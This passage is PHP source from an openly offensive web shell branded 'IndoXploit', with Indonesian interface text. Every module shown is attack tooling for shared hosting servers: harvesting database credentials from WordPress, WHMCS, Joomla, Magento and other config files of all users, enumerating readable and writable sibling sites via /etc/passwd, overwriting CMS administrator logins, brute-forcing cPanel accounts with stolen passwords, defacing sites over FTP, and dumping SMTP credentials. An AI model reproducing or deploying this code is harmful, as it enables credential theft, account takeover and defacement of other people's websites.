1091. "/home/$user_idx/public_html/hostbills/includes/iso4217.php" => "-hostbills-hostbills",
1092. "/home/$user_idx/public_html/hostbill/includes/iso4217.php" => "-hostbills-hostbill",
1093. "/home/$user_idx/public_html/cart/configuration.php" => "-cart-WHMCS",
1094. "/home/$user_idx/public_html/hosting/configuration.php" => "-hosting-WHMCS",
1095. "/home/$user_idx/public_html/buy/configuration.php" => "-buy-WHMCS",
1096. "/home/$user_idx/public_html/checkout/configuration.php" => "-checkout-WHMCS",
1097. "/home/$user_idx/public_html/host/configuration.php" => "-host-WHMCS",
1098. "/home/$user_idx/public_html/shop/configuration.php" => "-shop-WHMCS",
1099. "/home/$user_idx/public_html/shopping/configuration.php" => "-shopping-WHMCS",
1100. "/home/$user_idx/public_html/sale/configuration.php" => "-sale-WHMCS",
1101. "/home/$user_idx/public_html/client/configuration.php" => "-client-WHMCS",
1102. "/home/$user_idx/public_html/support/configuration.php" => "-support-WHMCS",
1103. "/home/$user_idx/public_html/clientsupport/configuration.php" => "-clientsupport-WHMCS",
1104. "/home/$user_idx/public_html/whmcs/configuration.php" => "-whmc-WHMCS",
1105. "/home/$user_idx/public_html/supp/configuration.php" => "-supp-WHMCS",
1106. "/home/$user_idx/public_html/secure/configuration.php" => "-sucure-WHMCS",
1107. "/home/$user_idx/public_html/secure/whm/configuration.php" => "-sucure-whm-WHMCS",
1108. "/home/$user_idx/public_html/secure/whmcs/configuration.php" => "-sucure-whmcs-WHMCS",
1109. "/home/$user_idx/public_html/panel/configuration.php" => "-panel-WHMCS",
1110. "/home/$user_idx/public_html/hosts/configuration.php" => "-hosts-WHMCS",
1111. "/home/$user_idx/public_html/submitticket.php" => "-submitticket-WHMCS",
1112. "/home/$user_idx/public_html/clients/configuration.php" => "-clients-WHMCS",
1113. "/home/$user_idx/public_html/clientes/configuration.php" => "-clientes-WHMCS",
1114. "/home/$user_idx/public_html/cliente/configuration.php" => "-client-WHMCS",
1115. "/home/$user_idx/public_html/billing/configuration.php" => "-billing-WHMCS",
1116. "/home/$user_idx/public_html/manage/configuration.php" => "-whm-manage-WHMCS",
1117. "/home/$user_idx/public_html/my/configuration.php" => "-whm-my-WHMCS",
1118. "/home/$user_idx/public_html/myshop/configuration.php" => "-whm-myshop-WHMCS",
1119. "/home/$user_idx/public_html/billings/configuration.php" => "-billings-WHMCS",
1120. "/home/$user_idx/public_html/supports/configuration.php" => "-supports-WHMCS",
1121. "/home/$user_idx/public_html/auto/configuration.php" => "-auto-WHMCS",
1122. "/home/$user_idx/public_html/go/configuration.php" => "-go-WHMCS",
1123. "/home/$user_idx/public_html/configuration.php" => "-USERNAME-WHMCS",
1124. "/home/$user_idx/public_html/bill/configuration.php" => "-bill-WHMCS",
1125. "/home/$user_idx/public_html/payment/configuration.php" => "-payment-WHMCS",
1126. "/home/$user_idx/public_html/pay/configuration.php" => "-pay-WHMCS",
1127. "/home/$user_idx/public_html/purchase/configuration.php" => "-purchase-WHMCS",
1128. "/home/$user_idx/public_html/clientarea/configuration.php" => "-clientarea-WHMCS",
1129. "/home/$user_idx/public_html/autobuy/configuration.php" => "-autobuy-WHMCS",
1130. "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
1131. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
1132. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
1133. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
1134. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
1135. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
1136. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
1137. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
1138. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
1139. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
1140. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
1141. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
1142. "/home/$user_idx/public_html/configuration.php" => "Joomla",
1143. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
1144. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
1145. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
1146. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
1147. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
1148. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
1149. foreach($grab_config as $config => $nama_config) {
1150. $ambil_config = file_get_contents($config);
1151. if($ambil_config == '') {
1152.  
1153. } else {
1154. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
1155. fputs($file_config,$ambil_config);
1156. }
1157. }
1158. }
1159. }
1160. }
1161. }
1162. echo "<center><a href='?dir=$dir/idx_config'><font color=#18BC9C>Done</font></a></center>";
1163.  
1164. } elseif($_GET['do'] == 'jumping') {
1165. $i = 0;
1166. echo "<div class='margin: 5px auto;'>";
1167. if(preg_match("/hsphere/", $dir)) {
1168. $urls = explode("\r\n", $_POST['url']);
1169. if(isset($_POST['jump'])) {
1170. echo "<pre>";
1171. foreach($urls as $url) {
1172. $url = str_replace(array("http://","www."), "", strtolower($url));
1173. $etc = "/etc/passwd";
1174. $f = fopen($etc,"r");
1175. while($gets = fgets($f)) {
1176. $pecah = explode(":", $gets);
1177. $user = $pecah[0];
1178. $dir_user = "/hsphere/local/home/$user";
1179. if(is_dir($dir_user) === true) {
1180. $url_user = $dir_user."/".$url;
1181. if(is_readable($url_user)) {
1182. $i++;
1183. $jrw = "[<font color=#18BC9C>R</font>] <a href='?dir=$url_user'><font color=#18BC9C>$url_user</font></a>";
1184. if(is_writable($url_user)) {
1185. $jrw = "[<font color=#18BC9C>RW</font>] <a href='?dir=$url_user'><font color=#18BC9C>$url_user</font></a>";
1186. }
1187. echo $jrw."<br>";
1188. }
1189. }
1190. }
1191. }
1192. if($i == 0) {
1193. } else {
1194. echo "<br>Total ada ".$i." Kamar di ".$ip;
1195. }
1196. echo "</pre>";
1197. } else {
1198. echo '<center>
1199. <form method="post">
1200. List Domains: <br>
1201. <textarea name="url" style="width: 500px; height: 250px;">';
1202. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
1203. while($getss = fgets($fp)) {
1204. echo $getss;
1205. }
1206. echo '</textarea><br>
1207. <input type="submit" value="Jumping" name="jump" class="btn btn-success btn-sm" style="width: 500px; height: 25px;">
1208. </form></center>';
1209. }
1210. } elseif(preg_match("/vhosts/", $dir)) {
1211. $urls = explode("\r\n", $_POST['url']);
1212. if(isset($_POST['jump'])) {
1213. echo "<pre>";
1214. foreach($urls as $url) {
1215. $web_vh = "/var/www/vhosts/$url/httpdocs";
1216. if(is_dir($web_vh) === true) {
1217. if(is_readable($web_vh)) {
1218. $i++;
1219. $jrw = "[<font color=#18BC9C>R</font>] <a href='?dir=$web_vh'><font color=#18BC9C>$web_vh</font></a>";
1220. if(is_writable($web_vh)) {
1221. $jrw = "[<font color=#18BC9C>RW</font>] <a href='?dir=$web_vh'><font color=#18BC9C>$web_vh</font></a>";
1222. }
1223. echo $jrw."<br>";
1224. }
1225. }
1226. }
1227. if($i == 0) {
1228. } else {
1229. echo "<br>Total ada ".$i." Kamar di ".$ip;
1230. }
1231. echo "</pre>";
1232. } else {
1233. echo '<center>
1234. <form method="post">
1235. List Domains: <br>
1236. <textarea name="url" style="width: 500px; height: 250px;">';
1237. bing("ip:$ip");
1238. echo '</textarea><br>
1239. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
1240. </form></center>';
1241. }
1242. } else {
1243. echo "<pre>";
1244. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
1245. while($passwd = fgets($etc)) {
1246. if($passwd == '' || !$etc) {
1247. echo "<font color=red>Can't read /etc/passwd</font>";
1248. } else {
1249. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
1250. foreach($user_jumping[1] as $user_idx_jump) {
1251. $user_jumping_dir = "/home/$user_idx_jump/public_html";
1252. if(is_readable($user_jumping_dir)) {
1253. $i++;
1254. $jrw = "[<font color=#18BC9C>R</font>] <a href='?dir=$user_jumping_dir'><font color=#18BC9C>$user_jumping_dir</font></a>";
1255. if(is_writable($user_jumping_dir)) {
1256. $jrw = "[<font color=#18BC9C>RW</font>] <a href='?dir=$user_jumping_dir'><font color=#18BC9C>$user_jumping_dir</font></a>";
1257. }
1258. echo $jrw;
1259. if(function_exists('posix_getpwuid')) {
1260. $domain_jump = file_get_contents("/etc/named.conf");
1261. if($domain_jump == '') {
1262. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
1263. } else {
1264. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
1265. foreach($domains_jump[1] as $dj) {
1266. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1267. $user_jumping_url = $user_jumping_url['name'];
1268. if($user_jumping_url == $user_idx_jump) {
1269. echo " => ( <u>$dj</u> )<br>";
1270. break;
1271. }
1272. }
1273. }
1274. } else {
1275. echo "<br>";
1276. }
1277. }
1278. }
1279. }
1280. }
1281. if($i == 0) {
1282. } else {
1283. echo "<br>Total ada ".$i." Kamar di ".$ip;
1284. }
1285. echo "</pre>";
1286. }
1287. echo "</div>";
1288. } elseif($_GET['do'] == 'auto_edit_user') {
1289. if($_POST['hajar']) {
1290. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1291. echo "username atau password harus lebih dari 6 karakter";
1292. } else {
1293. $user_baru = $_POST['user_baru'];
1294. $pass_baru = md5($_POST['pass_baru']);
1295. $conf = $_POST['config_dir'];
1296. $scan_conf = scandir($conf);
1297. foreach($scan_conf as $file_conf) {
1298. if(!is_file("$conf/$file_conf")) continue;
1299. $config = file_get_contents("$conf/$file_conf");
1300. if(preg_match("/JConfig|joomla/",$config)) {
1301. $dbhost = ambilkata($config,"host = '","'");
1302. $dbuser = ambilkata($config,"user = '","'");
1303. $dbpass = ambilkata($config,"password = '","'");
1304. $dbname = ambilkata($config,"db = '","'");
1305. $dbprefix = ambilkata($config,"dbprefix = '","'");
1306. $prefix = $dbprefix."users";
1307. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1308. $db = mysql_select_db($dbname);
1309. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1310. $result = mysql_fetch_array($q);
1311. $id = $result['id'];
1312. $site = ambilkata($config,"sitename = '","'");
1313. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1314. echo "Config => ".$file_conf."<br>";
1315. echo "CMS => Joomla<br>";
1316. if($site == '') {
1317. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1318. } else {
1319. echo "Sitename => $site<br>";
1320. }
1321. if(!$update OR !$conn OR !$db) {
1322. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1323. } else {
1324. echo "Status => <font color=#18BC9C>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1325. }
1326. mysql_close($conn);
1327. } elseif(preg_match("/WordPress/",$config)) {
1328. $dbhost = ambilkata($config,"DB_HOST', '","'");
1329. $dbuser = ambilkata($config,"DB_USER', '","'");
1330. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1331. $dbname = ambilkata($config,"DB_NAME', '","'");
1332. $dbprefix = ambilkata($config,"table_prefix = '","'");
1333. $prefix = $dbprefix."users";
1334. $option = $dbprefix."options";
1335. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1336. $db = mysql_select_db($dbname);
1337. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1338. $result = mysql_fetch_array($q);
1339. $id = $result[ID];
1340. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1341. $result2 = mysql_fetch_array($q2);
1342. $target = $result2[option_value];
1343. if($target == '') {
1344. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1345. } else {
1346. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1347. }
1348. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1349. echo "Config => ".$file_conf."<br>";
1350. echo "CMS => Wordpress<br>";
1351. echo $url_target;
1352. if(!$update OR !$conn OR !$db) {
1353. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1354. } else {
1355. echo "Status => <font color=#18BC9C>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1356. }
1357. mysql_close($conn);
1358. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
1359. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
1360. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
1361. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
1362. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
1363. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1364. $prefix = $dbprefix."admin_user";
1365. $option = $dbprefix."core_config_data";
1366. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1367. $db = mysql_select_db($dbname);
1368. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1369. $result = mysql_fetch_array($q);
1370. $id = $result[user_id];
1371. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1372. $result2 = mysql_fetch_array($q2);
1373. $target = $result2[value];
1374. if($target == '') {
1375. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1376. } else {
1377. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1378. }
1379. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1380. echo "Config => ".$file_conf."<br>";
1381. echo "CMS => Magento<br>";
1382. echo $url_target;
1383. if(!$update OR !$conn OR !$db) {
1384. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1385. } else {
1386. echo "Status => <font color=#18BC9C>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1387. }
1388. mysql_close($conn);
1389. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
1390. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
1391. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
1392. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
1393. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
1394. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
1395. $prefix = $dbprefix."user";
1396. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1397. $db = mysql_select_db($dbname);
1398. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1399. $result = mysql_fetch_array($q);
1400. $id = $result[user_id];
1401. $target = ambilkata($config,"HTTP_SERVER', '","'");
1402. if($target == '') {
1403. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1404. } else {
1405. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
1406. }
1407. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1408. echo "Config => ".$file_conf."<br>";
1409. echo "CMS => OpenCart<br>";
1410. echo $url_target;
1411. if(!$update OR !$conn OR !$db) {
1412. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1413. } else {
1414. echo "Status => <font color=#18BC9C>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1415. }
1416. mysql_close($conn);
1417. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
1418. $dbhost = ambilkata($config,'server = "','"');
1419. $dbuser = ambilkata($config,'username = "','"');
1420. $dbpass = ambilkata($config,'password = "','"');
1421. $dbname = ambilkata($config,'database = "','"');
1422. $prefix = "users";
1423. $option = "identitas";
1424. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1425. $db = mysql_select_db($dbname);
1426. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
1427. $result = mysql_fetch_array($q);
1428. $target = $result[alamat_website];
1429. if($target == '') {
1430. $target2 = $result[url];
1431. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1432. if($target2 == '') {
1433. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1434. } else {
1435. $cek_login3 = file_get_contents("$target2/adminweb/");
1436. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
1437. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
1438. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
1439. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
1440. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
1441. } else {
1442. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font><br>";
1443. }
1444. }
1445. } else {
1446. $cek_login = file_get_contents("$target/adminweb/");
1447. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
1448. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
1449. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
1450. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
1451. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
1452. } else {
1453. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font><br>";
1454. }
1455. }
1456. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1457. echo "Config => ".$file_conf."<br>";
1458. echo "CMS => Lokomedia<br>";
1459. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
1460. echo $url_target2;
1461. } else {
1462. echo $url_target;
1463. }
1464. if(!$update OR !$conn OR !$db) {
1465. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1466. } else {
1467. echo "Status => <font color=#18BC9C>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1468. }
1469. mysql_close($conn);
1470. }
1471. }
1472. }
1473. } else {
1474. echo "<center>
1475. <h1>Auto Edit User Config</h1>
1476. <form method='post'>
1477. DIR Config: <br>
1478. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
1479. Set User & Pass: <br>
1480. <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
1481. <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
1482. <input type='submit' name='hajar' class='btn btn-success btn-sm' value='Hajar!' style='width: 215px;'>
1483. </form>
1484. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
1485. ";
1486. }
1487. } elseif($_GET['do'] == 'cpanel') {
1488. if($_POST['crack']) {
1489. $usercp = explode("\r\n", $_POST['user_cp']);
1490. $passcp = explode("\r\n", $_POST['pass_cp']);
1491. $i = 0;
1492. foreach($usercp as $ucp) {
1493. foreach($passcp as $pcp) {
1494. if(@mysql_connect('localhost', $ucp, $pcp)) {
1495. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1496. } else {
1497. $_SESSION[$ucp] = "1";
1498. $_SESSION[$pcp] = "1";
1499. if($ucp == '' || $pcp == '') {
1500.  
1501. } else {
1502. $i++;
1503. if(function_exists('posix_getpwuid')) {
1504. $domain_cp = file_get_contents("/etc/named.conf");
1505. if($domain_cp == '') {
1506. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
1507. } else {
1508. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1509. foreach($domains_cp[1] as $dj) {
1510. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1511. $user_cp_url = $user_cp_url['name'];
1512. if($user_cp_url == $ucp) {
1513. $dom = "<a href='http://$dj/' target='_blank'><font color=#18BC9C>$dj</font></a>";
1514. break;
1515. }
1516. }
1517. }
1518. } else {
1519. $dom = "<font color=red>function is Disable by system</font>";
1520. }
1521. echo "username (<font color=#18BC9C>$ucp</font>) password (<font color=#18BC9C>$pcp</font>) domain ($dom)<br>";
1522. }
1523. }
1524. }
1525. }
1526. }
1527. if($i == 0) {
1528. } else {
1529. echo "<br>sukses nyolong ".$i." Cpanel by <font color=#18BC9C>IndoXploit.</font>";
1530. }
1531. } else {
1532. echo "<center>
1533. <form method='post'>
1534. USER: <br>
1535. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1536. $_usercp = fopen("/etc/passwd","r");
1537. while($getu = fgets($_usercp)) {
1538. if($getu == '' || !$_usercp) {
1539. echo "<font color=red>Can't read /etc/passwd</font>";
1540. } else {
1541. preg_match_all("/(.*?):x:/", $getu, $u);
1542. foreach($u[1] as $user_cp) {
1543. if(is_dir("/home/$user_cp/public_html")) {
1544. echo "$user_cp\n";
1545. }
1546. }
1547. }
1548. }
1549. echo "</textarea><br>
1550. PASS: <br>
1551. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1552. function cp_pass($dir) {
1553. $pass = "";
1554. $dira = scandir($dir);
1555. foreach($dira as $dirb) {
1556. if(!is_file("$dir/$dirb")) continue;
1557. $ambil = file_get_contents("$dir/$dirb");
1558. if(preg_match("/WordPress/", $ambil)) {
1559. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1560. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1561. $pass .= ambilkata($ambil,"password = '","'")."\n";
1562. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1563. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1564. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1565. $pass .= ambilkata($ambil,'password = "','"')."\n";
1566. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1567. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1568. } elseif(preg_match("/^[client]$/", $ambil)) {
1569. preg_match("/password=(.*?)/", $ambil, $pass1);
1570. if(preg_match('/"/', $pass1[1])) {
1571. $pass1[1] = str_replace('"', "", $pass1[1]);
1572. $pass .= $pass1[1]."\n";
1573. } else {
1574. $pass .= $pass1[1]."\n";
1575. }
1576. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1577. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1578. }
1579. }
1580. echo $pass;
1581. }
1582. $cp_pass = cp_pass($dir);
1583. echo $cp_pass;
1584. echo "</textarea><br>
1585. <input type='submit' name='crack' class='btn btn-success btn-sm' style='width: 450px;' value='Crack'>
1586. </form>
1587. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1588. }
1589. } elseif($_GET['do'] == 'cpftp_auto') {
1590. if($_POST['crack']) {
1591. $usercp = explode("\r\n", $_POST['user_cp']);
1592. $passcp = explode("\r\n", $_POST['pass_cp']);
1593. $i = 0;
1594. foreach($usercp as $ucp) {
1595. foreach($passcp as $pcp) {
1596. if(@mysql_connect('localhost', $ucp, $pcp)) {
1597. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1598. } else {
1599. $_SESSION[$ucp] = "1";
1600. $_SESSION[$pcp] = "1";
1601. if($ucp == '' || $pcp == '') {
1602. //
1603. } else {
1604. echo "[+] username (<font color=#18BC9C>$ucp</font>) password (<font color=#18BC9C>$pcp</font>)<br>";
1605. $ftp_conn = ftp_connect($ip);
1606. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1607. if((!$ftp_login) || (!$ftp_conn)) {
1608. echo "[+] <font color=red>Login Gagal</font><br><br>";
1609. } else {
1610. echo "[+] <font color=#18BC9C>Login Sukses</font><br>";
1611. $fi = htmlspecialchars($_POST['file_deface']);
1612. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1613. if($deface) {
1614. $i++;
1615. echo "[+] <font color=#18BC9C>Deface Sukses</font><br>";
1616. if(function_exists('posix_getpwuid')) {
1617. $domain_cp = file_get_contents("/etc/named.conf");
1618. if($domain_cp == '') {
1619. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1620. } else {
1621. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1622. foreach($domains_cp[1] as $dj) {
1623. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1624. $user_cp_url = $user_cp_url['name'];
1625. if($user_cp_url == $ucp) {
1626. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1627. break;
1628. }
1629. }
1630. }
1631. } else {
1632. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
1633. }
1634. } else {
1635. echo "[-] <font color=red>Deface Gagal</font><br><br>";
1636. }
1637. }
1638. //echo "username (<font color=#18BC9C>$ucp</font>) password (<font color=#18BC9C>$pcp</font>)<br>";
1639. }
1640. }
1641. }
1642. }
1643. }
1644. if($i == 0) {
1645. } else {
1646. echo "<br>sukses deface ".$i." Cpanel by <font color=#18BC9C>IndoXploit.</font>";
1647. }
1648. } else {
1649. echo "<center>
1650. <form method='post'>
1651. Filename: <br>
1652. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1653. Deface Page: <br>
1654. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
1655. USER: <br>
1656. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
1657. $_usercp = fopen("/etc/passwd","r");
1658. while($getu = fgets($_usercp)) {
1659. if($getu == '' || !$_usercp) {
1660. echo "<font color=red>Can't read /etc/passwd</font>";
1661. } else {
1662. preg_match_all("/(.*?):x:/", $getu, $u);
1663. foreach($u[1] as $user_cp) {
1664. if(is_dir("/home/$user_cp/public_html")) {
1665. echo "$user_cp\n";
1666. }
1667. }
1668. }
1669. }
1670. echo "</textarea><br>
1671. PASS: <br>
1672. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
1673. function cp_pass($dir) {
1674. $pass = "";
1675. $dira = scandir($dir);
1676. foreach($dira as $dirb) {
1677. if(!is_file("$dir/$dirb")) continue;
1678. $ambil = file_get_contents("$dir/$dirb");
1679. if(preg_match("/WordPress/", $ambil)) {
1680. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1681. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1682. $pass .= ambilkata($ambil,"password = '","'")."\n";
1683. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1684. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1685. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
1686. $pass .= ambilkata($ambil,'password = "','"')."\n";
1687. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1688. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1689. } elseif(preg_match("/client/", $ambil)) {
1690. preg_match("/password=(.*)/", $ambil, $pass1);
1691. if(preg_match('/"/', $pass1[1])) {
1692. $pass1[1] = str_replace('"', "", $pass1[1]);
1693. $pass .= $pass1[1]."\n";
1694. }
1695. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1696. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1697. }
1698. }
1699. echo $pass;
1700. }
1701. $cp_pass = cp_pass($dir);
1702. echo $cp_pass;
1703. echo "</textarea><br>
1704. <input type='submit' name='crack' style='width: 450px;' class='btn btn-success btn-sm' value='Hajar'>
1705. </form>
1706. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
1707. }
1708. } elseif($_GET['do'] == 'smtp') {
1709. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
1710. function scj($dir) {
1711. $dira = scandir($dir);
1712. foreach($dira as $dirb) {
1713. if(!is_file("$dir/$dirb")) continue;
1714. $ambil = file_get_contents("$dir/$dirb");
1715. $ambil = str_replace("$", "", $ambil);
1716. if(preg_match("/JConfig|joomla/", $ambil)) {
1717. $smtp_host = ambilkata($ambil,"smtphost = '","'");
1718. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1719. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1720. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1721. $smtp_port = ambilkata($ambil,"smtpport = '","'");
1722. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1723. echo "SMTP Host: <font color=#18BC9C>$smtp_host</font><br>";
1724. echo "SMTP port: <font color=#18BC9C>$smtp_port</font><br>";
1725. echo "SMTP user: <font color=#18BC9C>$smtp_user</font><br>";
1726. echo "SMTP pass: <font color=#18BC9C>$smtp_pass</font><br>";
1727. echo "SMTP auth: <font color=#18BC9C>$smtp_auth</font><br>";
1728. echo "SMTP secure: <font color=#18BC9C>$smtp_secure</font><br><br>";
1729. }
1730. }
1731. }
1732. $smpt_hunter = scj($dir);
1733. echo $smpt_hunter;
1734. } elseif($_GET['do'] == 'auto_wp') {
1735. if($_POST['hajar']) {
